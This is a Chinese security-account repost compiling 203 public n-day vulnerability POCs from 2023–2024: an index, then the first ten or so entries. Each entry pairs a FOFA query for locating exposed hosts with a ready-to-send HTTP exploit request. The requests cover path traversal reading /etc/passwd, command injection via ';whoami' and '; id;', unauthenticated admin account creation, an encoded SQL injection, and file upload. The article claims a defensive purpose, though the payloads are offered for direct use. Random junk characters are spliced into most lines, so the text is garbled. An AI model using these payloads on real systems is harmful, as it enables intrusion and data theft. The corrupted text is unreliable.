互联网公开漏洞整理202309-202406
) m! i- a Y/ v4 Z/ E/ ~道一安全 2024-06-05 07:41 北京
+ H$ m1 O! U3 R' c8 A* T; e1 `以下文章来源于网络安全新视界 ,作者网络安全新视界
, G' f8 J' S( Q) D) k5 e9 a7 S1 E+ y, \, b5 b. n: A
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
+ ?3 ?: r6 a) O8 e6 i$ ` q
! i5 G* N2 |2 K% N; G0 O. ~漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。6 }3 \, Y, e' ?/ O5 V2 r& b
& e d+ W4 w0 _1 a; d3 X9 R, ?
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
' x" h( R8 @. [, t {2 b+ p2 _ A" T( ^+ \4 s9 c9 L# p+ q
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。2 u; m& I1 ~0 G: F! j$ I/ O- f
0 b$ S- H+ Q; h0 o8 L合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
, l+ _4 ?$ t& X+ V
+ D& S d: S( ]5 V! m" S
5 O2 c1 @5 i/ l+ ?1 ^声明
+ f7 [0 n: Q6 y% z; `5 w0 d% `' n
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
* `, F5 }5 u0 f
. g- o: R5 q; b4 R7 Q" j( U有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。. E2 i9 O3 Y9 P9 d2 \7 v
/ g v1 F% ?9 d1 C& j$ e$ X3 I
8 D. T, _4 h; ]
, R: |% j/ E0 k, `) H: h! y目录6 ]4 s0 ~# n5 o9 \3 o! ?
6 J/ g1 w, N7 U$ [- t# }) o1 e( F
01
+ [3 {' B9 c$ |# p3 f% F
" |) x& {( ^5 L1. StarRocks MPP数据库未授权访问
) ?9 j/ O& g# I6 m3 C) K5 b$ N2. Casdoor系统static任意文件读取 O* T6 j* _! B3 M# b* p: m
3. EasyCVR智能边缘网关 userlist 信息泄漏6 t; v. s9 Q; U2 \4 K1 Z: P
4. EasyCVR视频管理平台存在任意用户添加
6 p7 q0 r5 D2 K5. NUUO NVR 视频存储管理设备远程命令执行# n' o8 D7 \- W9 V5 ]' N8 N
6. 深信服 NGAF 任意文件读取
9 i# p' e7 D1 i, W6 b3 l7. 鸿运主动安全监控云平台任意文件下载0 x( L3 y* c$ ?6 r: V" e* I
8. 斐讯 Phicomm 路由器RCE' T. ^4 C/ H: H
9. 稻壳CMS keyword 未授权SQL注入
- h1 A5 H3 {% u" l6 L6 X( Z10. 蓝凌EIS智慧协同平台api.aspx任意文件上传* P1 x. R( `1 W+ W* @
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
" i# u5 r7 g9 w1 W12. Jorani < 1.0.2 远程命令执行
* g& j, S* p& d2 S13. 红帆iOffice ioFileDown任意文件读取
) H4 K- n, H6 e5 z7 `2 V14. 华夏ERP(jshERP)敏感信息泄露6 L8 [0 ]' E& J* x! x
15. 华夏ERP getAllList信息泄露
2 s; R0 Z! E- M: L8 [" f: e16. 红帆HFOffice医微云SQL注入
* z ~& @# K( i5 A0 U! J17. 大华 DSS itcBulletin SQL 注入
0 E' E& u/ x6 L0 x5 \18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ K" H# t* m; [4 j1 Z
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 L, K9 k4 ?6 Q9 y% }* w. x. F
20. 大华ICC智能物联综合管理平台任意文件读取
( N1 P+ m$ d! G8 d21. 大华ICC智能物联综合管理平台random远程代码执行
! l1 ^ ^& O& E6 o2 i" j! L* H" |22. 大华ICC智能物联综合管理平台 log4j远程代码执行
4 W& U0 ?8 t5 p2 h/ R( a23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 o+ H5 m- _ c+ e24. 用友NC 6.5 accept.jsp任意文件上传5 T$ \3 L* j5 w6 \( Q6 b
25. 用友NC registerServlet JNDI 远程代码执行- a3 T0 T0 X- t' X' A; n4 d
26. 用友NC linkVoucher SQL注入
5 p" |7 J8 ^" @- O' P1 ? l8 @9 M27. 用友 NC showcontent SQL注入
5 t3 T* m! l. p6 \( Q# \28. 用友NC grouptemplet 任意文件上传
- c& B4 ~5 R7 A3 n$ s29. 用友NC down/bill SQL注入
9 M7 @: @' j1 J) d30. 用友NC importPml SQL注入
2 w6 r, O+ m. L8 t# m31. 用友NC runStateServlet SQL注入
, T. d4 l+ E/ F4 d+ k32. 用友NC complainbilldetail SQL注入4 |3 o$ _, M- Q. r3 \$ A6 |
33. 用友NC downTax/download SQL注入+ a# X4 i* W& I! b8 [" j
34. 用友NC warningDetailInfo接口SQL注入3 E2 N4 a0 f' H# _0 z+ c
35. 用友NC-Cloud importhttpscer任意文件上传
' g+ k# D% y$ k) w, I- v1 l4 q36. 用友NC-Cloud soapFormat XXE+ c6 x; U( x0 E* ^
37. 用友NC-Cloud IUpdateService XXE7 B4 J! E3 Q6 T" H/ N7 \8 q2 ]
38. 用友U8 Cloud smartweb2.RPC.d XXE H/ N, x& S, F& C7 j
39. 用友U8 Cloud RegisterServlet SQL注入+ V& ^7 l) G6 P! c5 A% o2 {# i
40. 用友U8-Cloud XChangeServlet XXE7 ~, I R/ d4 X+ S! Z8 [- H6 p) x2 L
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入/ W+ e. ?' ~. ]) Y5 Y
42. 用友GRP-U8 SmartUpload01 文件上传 J/ \7 J: h R* l5 c
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
7 z+ C: ]) b/ Y/ ~: t44. 用友GRP-U8 bx_dj_check.jsp SQL注入, g- N A& W9 Q- X/ ?' c
45. 用友GRP-U8 ufgovbank XXE
( f/ Y$ q, b& f) C" r# U46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& {$ k% V* J1 ]% Y' [0 w3 t3 ^47. 用友GRP A++Cloud 政府财务云 任意文件读取
* l3 v9 U6 k a8 F. G8 z8 R48. 用友U8 CRM swfupload 任意文件上传/ w5 K% ?3 t0 u$ B4 L7 p3 X
49. 用友U8 CRM系统uploadfile.php接口任意文件上传& o, U: k. q C8 p6 \! \
50. QDocs Smart School 6.4.1 filterRecords SQL注入4 W& e/ C6 O" w1 M% x2 k
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ u3 }; ^2 U# ? T* Q D* w* x
52. 泛微E-Office json_common.php sql注入
; U- ~% C8 m7 U53. 迪普 DPTech VPN Service 任意文件上传8 o/ @( a' T3 @* f
54. 畅捷通T+ getstorewarehousebystore 远程代码执行. B9 G Y8 [3 h2 Y5 W9 B
55. 畅捷通T+ getdecallusers信息泄露
3 m' |- q2 n) k2 i56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: L- L. I. p" f% s
57. 畅捷通T+ keyEdit.aspx SQL注入- N* _' Z! K( g6 N$ C! @
58. 畅捷通T+ KeyInfoList.aspx sql注入
. B6 C0 ?0 a' G, f, d1 }) R* u59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 w, P% \" s( r2 p
60. 百卓Smart管理平台 importexport.php SQL注入
m' t5 a; |4 H6 L* ^/ A61. 浙大恩特客户资源管理系统 fileupload 任意文件上传+ s+ D& O$ k* }! l- e2 D% G
62. IP-guard WebServer 远程命令执行9 ]1 K) y+ f, G
63. IP-guard WebServer任意文件读取
# A n- H, Y C9 x8 T. J64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) U" {4 W) H+ I7 a. A65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过9 x3 [5 l3 S3 R
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) B4 U' L! L! B
67. 万户ezOFFICE wpsservlet任意文件上传: P7 x' p/ K6 T0 O, |9 G# |1 {
68. 万户ezOFFICE wf_printnum.jsp SQL注入
8 q* v) k( W0 Z, ], I69. 万户 ezOFFICE contract_gd.jsp SQL注入! M2 `1 }6 ~6 Q: o; y
70. 万户ezEIP success 命令执行
! N5 y' H4 J: J( ^* \8 p0 D2 r, Q% ]9 z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ I- X* a/ x% ?: o3 v" L
72. 致远OA getAjaxDataServlet XXE$ q7 y1 \4 ]+ ~' Z1 [7 ?" t
73. GeoServer wms远程代码执行
: i9 Z/ M7 I. |, G+ B74. 致远M3-server 6_1sp1 反序列化RCE' ?9 Z3 K& {; v7 |. c j2 N3 S- w# ?% \
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE+ E) x/ k' @& x( a& R
76. 新开普掌上校园服务管理平台service.action远程命令执行- |0 p/ e. O+ u
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: e" V# ?9 x$ ~ v# g( l78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, s) ^" n5 G1 X% Z
79. BYTEVALUE 百为流控路由器远程命令执行
" Y+ h( ^( L9 d7 ]7 x* u8 `& v80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- P* n3 s: j* e( l- O) k81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
+ y% ^1 l+ ?/ W$ |5 H4 i$ V82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# l- K6 i5 h; @) d V0 t83. JeecgBoot testConnection 远程命令执行
/ L) E9 g$ e' |3 W, e84. Jeecg-Boot JimuReport queryFieldBySql 模板注入* Z' |2 [ {* P% L- ~4 @7 s7 \0 h5 b
85. SysAid On-premise< 23.3.36远程代码执行$ J8 ]0 @& T& f- m/ L
86. 日本tosei自助洗衣机RCE
+ W8 k3 c" T5 b4 k87. 安恒明御安全网关aaa_local_web_preview文件上传
1 {6 z2 J5 x% ]9 B2 G88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行! n% w9 ?0 {, Q" L/ |
89. 致远互联FE协作办公平台editflow_manager存在sql注入
; B& x+ a0 i/ |" _% F' _8 U90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
, Z# e2 O2 [7 Z$ N5 q+ O91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
9 D$ D. V t6 h4 U* @4 D92. 海康威视运行管理中心session命令执行
: k8 A* h0 \- B& _93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传; M; o }4 x- V# O y
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 G: J* g; k! o* N) ~, m95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
0 i k U. M. D, y9 u8 S, O9 v96. Apache OFBiz 18.12.11 groovy 远程代码执行- s5 ]0 x% J' @' u7 ^
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 R* U/ o. e. f/ i% r
98. SpiderFlow爬虫平台远程命令执行
$ Y: i- t& t2 r% e% m9 w# X" t99. Ncast盈可视高清智能录播系统busiFacade RCE
0 E) E4 Y6 i9 t5 i+ `' t/ P3 }100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, \4 D* s+ y% m9 l- s) g101. ivanti policy secure-22.6命令注入
8 x3 D& m4 k# V9 f: q+ S- Q; Q102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
7 c: F6 f4 V& n( C' }) {0 ]103. Ivanti Pulse Connect Secure VPN XXE
' x$ P$ Z3 `4 q1 F; t104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露7 m& p4 w5 `% H# v
105. SpringBlade v3.2.0 export-user SQL 注入
+ L* W; d6 ]+ W4 M9 K106. SpringBlade dict-biz/list SQL 注入
+ e) m4 g; z8 d) V107. SpringBlade tenant/list SQL 注入/ U- S3 F; v, c7 o' ?4 X
108. D-Tale 3.9.0 SSRF }( y+ Z |7 R! O9 N
109. Jenkins CLI 任意文件读取7 @5 v$ A" Y3 @+ \- e- }, V+ B u
110. Goanywhere MFT 未授权创建管理员
2 n& Q; _9 Z+ e111. WordPress Plugin HTML5 Video Player SQL注入% T! Q1 X0 W; g# C
112. WordPress Plugin NotificationX SQL 注入- A; Q l4 K+ T1 g2 k T- V
113. WordPress Automatic 插件任意文件下载和SSRF
$ ], ?1 w8 i3 c3 k! V) B" r114. WordPress MasterStudy LMS插件 SQL注入
- L. S$ ?" g6 s n115. WordPress Bricks Builder <= 1.9.6 RCE
3 w: R6 D) _. I5 s116. wordpress js-support-ticket文件上传4 d# g( O# I0 n! y; I6 Y7 |
117. WordPress LayerSlider插件SQL注入- t9 b: E# O0 j
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传( H$ } C# ?7 z B
119. 北京百绰智能S20后台sysmanageajax.php sql注入( v& i% @$ L K( H/ Q4 r
120. 北京百绰智能S40管理平台导入web.php任意文件上传- ]- B+ ]8 b, |
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) ~# k- e6 o& l: |0 x2 s122. 北京百绰智能s200管理平台/importexport.php sql注入. N; ~) i- t' l, T$ Q# w R
123. Atlassian Confluence 模板注入代码执行
/ F; r' u$ l' @) M& @124. 湖南建研工程质量检测系统任意文件上传0 S* g- K8 E5 k
125. ConnectWise ScreenConnect身份验证绕过& b( ^& j4 u$ R
126. Aiohttp 路径遍历
9 Z# `" n6 @# c( N) x& P9 _! X/ @127. 广联达Linkworks DataExchange.ashx XXE
0 E% n6 q b% \128. Adobe ColdFusion 反序列化
& {8 c2 Y _4 w$ y129. Adobe ColdFusion 任意文件读取/ ~6 c9 C2 b+ X+ p. Q/ d
130. Laykefu客服系统任意文件上传: i" g) s9 q1 ]
131. Mini-Tmall <=20231017 SQL注入% h/ `3 N; F, q7 Y" S
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 s5 z# l$ q0 H133. H5 云商城 file.php 文件上传
/ I- W8 G! a! r134. 网康NS-ASG应用安全网关index.php sql注入
/ S$ h% X- Z9 Q135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入2 z+ I; y, z$ u. ]
136. NextChat cors SSRF
3 c6 z5 ?. M. e6 v% ]$ b137. 福建科立迅通信指挥调度平台down_file.php sql注入
: I$ _8 r! c+ Z+ Q138. 福建科立讯通信指挥调度平台pwd_update.php sql注入' {$ a& \; g- r$ I5 Q
139. 福建科立讯通信指挥调度平台editemedia.php sql注入. y; i% v# R; }* R) ? J
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' B1 e }# ^5 y7 G( `& j# c: F2 _
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 ^* I) d' D0 Y142. CMSV6车辆监控平台系统中存在弱密码: C; `0 ^% @) ]7 @( Y2 P# y4 m
143. Netis WF2780 v2.1.40144 远程命令执行: B% U/ `1 `& c) J! U5 B' v2 Q
144. D-Link nas_sharing.cgi 命令注入* r8 ?- V7 x# @
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入 ?$ p' E* A8 G' j
146. MajorDoMo thumb.php 未授权远程代码执行1 \- \. ?, a& q: b1 L9 d2 K$ b
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 i" F3 }2 W' q' J @' ]1 E
148. CrushFTP 认证绕过模板注入 Z4 |- x& o+ |- z2 \ p
149. AJ-Report开源数据大屏存在远程命令执行 g) T* Q6 Z9 x4 U9 D( w
150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 P5 c Y& m+ h$ I- \151. AJ-Report 1.4.1 pageList sql注入+ g$ S) ]$ T! e. }
152. Progress Kemp LoadMaster 远程命令执行0 c( K1 Z# f0 B1 O
153. gradio任意文件读取# s, ^, ~, ?2 J0 B: n9 }. _6 {
154. 天维尔消防救援作战调度平台 SQL注入
: F! n3 [$ n, D+ A* o! w155. 六零导航页 file.php 任意文件上传
X+ a4 g1 ?2 E0 X1 A; ?/ h156. TBK DVR-4104/DVR-4216 操作系统命令注入
* w5 @; k3 e. R# T157. 美特CRM upload.jsp 任意文件上传) r9 r6 |1 e4 `
158. Mura-CMS-processAsyncObject存在SQL注入9 I5 m5 P$ m) Y# P/ z: U. z
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
0 m7 c. N$ a% D5 ]8 Y: Z) ]" q% ?* `! _160. Sonatype Nexus Repository 3目录遍历与文件读取3 T0 c5 t8 u5 Z7 }9 H
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传/ ` ?6 `8 G: Y) {2 G, v
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
' p( N3 f2 F2 i: B5 M8 I163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# P0 G: W( r* T" e6 ]- c4 o164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传 S+ c7 A# d% K6 ^* B( f7 l
165. OrangeHRM 3.3.3 SQL 注入# m& z1 ` V; d5 c
166. 中成科信票务管理平台SeatMapHandler SQL注入( v/ Z# T: |& p! M$ a: v9 ^
167. 精益价值管理系统 DownLoad.aspx任意文件读取+ }' r5 j: p5 t, b5 k9 @ g( U
168. 宏景EHR OutputCode 任意文件读取
0 w) j3 h T2 t, [ @169. 宏景EHR downlawbase SQL注入
* ~( y; M- F) j$ B170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 [! t, I9 b# C) |
171. 通天星CMSV6车载定位监控平台 SQL注入! p" x2 R+ V/ U9 N
172. DT-高清车牌识别摄像机任意文件读取$ T9 n: [) e1 H/ D6 v
173. Check Point 安全网关任意文件读取
$ E+ N% |3 H+ ^174. 金和OA C6 FileDownLoad.aspx 任意文件读取
: f0 s( P# B, [3 D175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! v4 @; d0 i' }7 Z& x
176. 电信网关配置管理系统 rewrite.php 文件上传( G+ c7 f. U& w2 Z
177. H3C路由器敏感信息泄露
) N6 o% D# u& Z3 H6 `0 `) F178. H3C校园网自助服务系统-flexfileupload-任意文件上传
9 I& @2 }$ a* R j4 @179. 建文工程管理系统存在任意文件读取
* A9 {4 P+ S) e- ^7 ]180. 帮管客 CRM jiliyu SQL注入
3 m: S& d( L' | ?/ O; Y181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入6 U+ T/ W- D1 h
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建9 t8 Q6 x; ?4 D! G `* z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入8 Z2 m8 `) `- m ]$ O* n
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
- L; Z6 q# z; k' [' x$ E/ K185. 瑞友天翼应用虚拟化系统SQL注入/ G }) r+ Y `/ b" U b6 I
186. F-logic DataCube3 SQL注入1 R, P# e( q6 x! ?! j
187. Mura CMS processAsyncObject SQL注入7 ^* r, X& [& A& e" S: Z
188. 叁体-佳会视频会议 attachment 任意文件读取
! \; N. y4 a# N0 x189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 n& j7 k* Q6 I
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
/ z- m# v2 ]4 @) ?% x ~2 D191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* s0 k+ k9 P0 Q. H6 K+ o0 W
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
1 K& [/ k; ^5 Y1 u& F; B193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行) J# b; i& b! O8 {+ b# \
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, Q6 C) F% p0 e& O
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: I3 E" f8 P8 m( f5 I' b2 h
196. 河南省风速科技统一认证平台密码重置4 O% _. M4 e( f$ ~) a
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
7 D$ j# k' D8 u W y& [198. 阿里云盘 WebDAV 命令注入
; a& m6 M0 Y, U0 b$ X8 i' X- Q; s199. cockpit系统assetsmanager_upload接口 文件上传
9 I1 G7 {2 E D6 e8 B- P200. SeaCMS海洋影视管理系统dmku SQL注入
2 `! c7 s! M- Y/ O. Z5 r0 ]201. 方正全媒体新闻采编系统 binary SQL注入 `0 U% w6 g/ A3 ]+ Q; @* d8 W
202. 微擎系统 AccountEdit任意文件上传
5 s* k9 G7 V. H( s+ N$ z203. 红海云EHR PtFjk 文件上传
* K/ ^5 C! s& u7 E
# U! v# S& O, ~5 d1 a0 Y4 f, yPOC列表
( O! _3 n, Q; w( ^4 e: r' S: h/ f5 ]$ r
02
# `* d" C+ L% |1 ~+ G; K ~* n
+ ]. W- q8 Z6 n: {1. StarRocks MPP数据库未授权访问
) g2 _0 C0 N1 ZFOFA :title="StarRocks"5 H+ C0 E5 p3 Z5 S; l
GET /mem_tracker HTTP/1.1
+ @4 S" r! j2 X1 sHost: URL
/ d, m% u. M3 a, P' E. v5 V
: c6 b6 U3 E7 f! ]/ R$ t; ]9 i1 \: Q: q+ {! M% }% c Q
2. Casdoor系统static任意文件读取2 z$ ?4 N% ~* j% f
FOFA :title="Casdoor"
% l/ v/ ?) Q, C& i; rGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1) l# X2 ?4 N S. f7 [3 l* _' r3 z2 w9 y4 U
Host: xx.xx.xx.xx:99996 @4 g7 `+ o& ~6 g I9 M+ V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ I2 |5 X% }3 O3 Q6 [, I
Connection: close0 r5 g7 {/ f6 }9 q
Accept: */*
7 D' l8 o: _. @& IAccept-Language: en
( X- u3 |8 T' w' W! m/ zAccept-Encoding: gzip
" \; L- h' ] a* ] u4 R# M: G, a+ m) G
9 H L4 s$ O! I4 m" D
3. EasyCVR智能边缘网关 userlist 信息泄漏9 W5 A$ T5 R+ i6 V; n y w
FOFA :title="EasyCVR"
0 R8 j- s' E+ p3 e* AGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1! G3 |4 p1 O; N7 v" g7 S' u
Host: xx.xx.xx.xx
0 i C' J" Z& j0 \* z
5 P" ^( |+ K+ G7 G
" X0 q) X, o: f& q8 A6 i4. EasyCVR视频管理平台存在任意用户添加
, |3 y: | Z: m& t. @1 e1 {FOFA :title="EasyCVR"6 o9 w4 f( s/ l3 z
- q8 x7 A6 O4 l4 Tpassword更改为自己的密码md5
! |7 Q" l2 M' _3 LPOST /api/v1/adduser HTTP/1.1
6 u3 v: r; r4 c/ vHost: your-ip+ [, g O U u+ J6 [$ I; l* G6 P
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 t7 }; `, p" m( q; X1 U2 D- @
% y- {0 k; I$ y0 T% H" n5 N4 t
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
( ~# Z# Q- T* c+ X+ J; s5 G, G7 ~6 w/ V( V0 w
; z. ^* A5 S5 h1 v; L9 P& f
5. NUUO NVR 视频存储管理设备远程命令执行' n* j/ B) q; Z$ a) U+ r
FOFA:title="Network Video Recorder Login"
! _' q$ Y9 x! B8 _+ x. m1 E! ZGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: y: p- c, j; l+ Q: z& a) z& iHost: xx.xx.xx.xx/ @% h- R/ A, P3 A
! R7 [0 g! H5 Q/ t& o/ ~( M4 X
, N, c" M( O; O4 E6. 深信服 NGAF 任意文件读取
' @% D9 R3 R' r ~ W Y& W* VFOFA:title="SANGFOR | NGAF"
" i) Y7 p4 m2 O0 V: h- qGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.11 B$ ?7 [( d- m: F, d3 [5 e: _
Host:% m& F) c2 Y5 E) K, \0 q
! P( f( \. ~9 @+ F$ t o* U9 l7 t% |* M: i8 \' s; P" ?4 s
7. 鸿运主动安全监控云平台任意文件下载4 z! H$ ` d! _! ?
FOFA:body="./open/webApi.html"" C& r5 E$ `1 d4 P- Z3 x# c% w
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1+ F: o ?4 P- `! ^: {. Z
Host:
; a( o% Y+ W1 b* M4 O O7 @- E7 h2 x! b1 y9 J c9 ?* N
7 [$ M B/ I2 v$ R5 _1 Q
8. 斐讯 Phicomm 路由器RCE: h4 b' V* t) f5 i1 K, z ?0 s
FOFA:icon_hash="-1344736688"
( G& R n; g( y2 z: \: h0 R默认账号admin登录后台后,执行操作+ s E# d' [" I
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1# z- ]5 W* o' c8 e; e: C
Host: x.x.x.x5 \- V* @ X# T: x" Y
Cookie: sysauth=第一步登录获取的cookie
! }6 R& K* X/ p d. lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
* q8 R( W, P8 T, |7 yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 u& q5 j/ @9 C% q K; ?
3 f6 G4 ]1 Z3 x& [. Z------WebKitFormBoundaryxbgjoytz7 r% B) v9 O6 a7 I8 u! G
Content-Disposition: form-data; name="wifiRebootEnablestatus"9 W3 v+ _" [. F/ T6 q& L9 ]' b
9 @/ N1 @; R- l! f
%s
2 e* \& d8 {5 c0 T: C4 i------WebKitFormBoundaryxbgjoytz
% q F9 A7 p1 J! W# K0 y, ^Content-Disposition: form-data; name="wifiRebootrange"
4 L$ y- w6 z; T5 w# A9 {
/ S6 M! ?5 j6 ? D6 `12:00; id;1 p4 T& { p5 s% l( \5 e
------WebKitFormBoundaryxbgjoytz
; ~* N s2 R6 e8 JContent-Disposition: form-data; name="wifiRebootendrange"
N8 z. T% z; d( s5 x
3 r8 o! {) i8 U1 Y& U4 z5 ? V# h%s:! p6 K' @- V# M+ J9 Z
------WebKitFormBoundaryxbgjoytz. D$ @% F4 }$ s/ s, Z
Content-Disposition: form-data; name="cururl2"4 R3 G4 j! x9 j0 l; ~
0 `" R6 x* Y3 O' T9 |
8 N8 K9 U! T7 P------WebKitFormBoundaryxbgjoytz--0 R0 _: `0 {1 d8 L7 V
V5 {( o0 t1 L: b3 Z: p' t
$ D- b/ d5 j8 B5 q5 g9. 稻壳CMS keyword 未授权SQL注入# e- {; f0 d+ U6 V
FOFA:app="Doccms"0 v: q& H4 |, f1 H4 { a" H+ [8 r1 {
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
1 U7 o$ X3 P, g% q( r0 [Host: x.x.x.x! [+ W. r$ c) Z2 ~& ~
- Q3 e' [. Q4 B1 p# {" u8 ~
% L. [: Y; ^. A7 |& kpayload为下列语句的二次Url编码
: l! T% s2 h* f6 Q# q# R4 Z' I; j# |, F0 C: H" j
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
1 w) A) I: A7 S' T0 r, E3 t; S5 }/ T% z# I' s% ~2 E# {( c6 }+ O
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
' f+ F: _8 l& W& n' W- l9 v3 D hFOFA:icon_hash="953405444"5 y @5 z: H" n8 v) `$ y5 }5 k
w- a# d0 X# I
文件上传后响应中包含上传文件的路径
/ J5 Y5 G' _0 o: N; dPOST /eis/service/api.aspx?action=saveImg HTTP/1.1- } N. T' i( N& S+ R; O
Host: x.x.x.x:xx+ o( U) W: q6 @# o+ a9 K% e8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
7 ^4 t" h$ u& K& P2 p! }' m; H$ fContent-Length: 197
, V% }& e6 S f" RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% Y) Q$ b+ ~* x9 \
Accept-Encoding: gzip, deflate
% ~5 Q$ A2 a+ DAccept-Language: zh-CN,zh;q=0.9
- R: r( @: ~4 k8 t* iConnection: close
' s4 V8 {9 F) r9 o: x* EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
9 q2 ^: c; r- q$ n" ]$ o7 q6 o$ L# k3 q/ c( s; }# A
------WebKitFormBoundaryxdgaqmqu8 a# `# \: L1 q+ `$ H9 t
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
! K5 g+ n- Z/ k E' o' f7 g' |" mContent-Type: text/html8 I! m+ c+ ?7 F* B) T$ ^5 r" W
4 H |8 I/ ^- X9 X+ Y
jmnqjfdsupxgfidopeixbgsxbf$ n' I0 {1 r3 b
------WebKitFormBoundaryxdgaqmqu--
( _/ H3 Q! s7 n7 m0 a
j8 p% I! `! A; p
) X1 r% r5 t1 m) j11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 E5 K3 t1 U% `# D( d
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
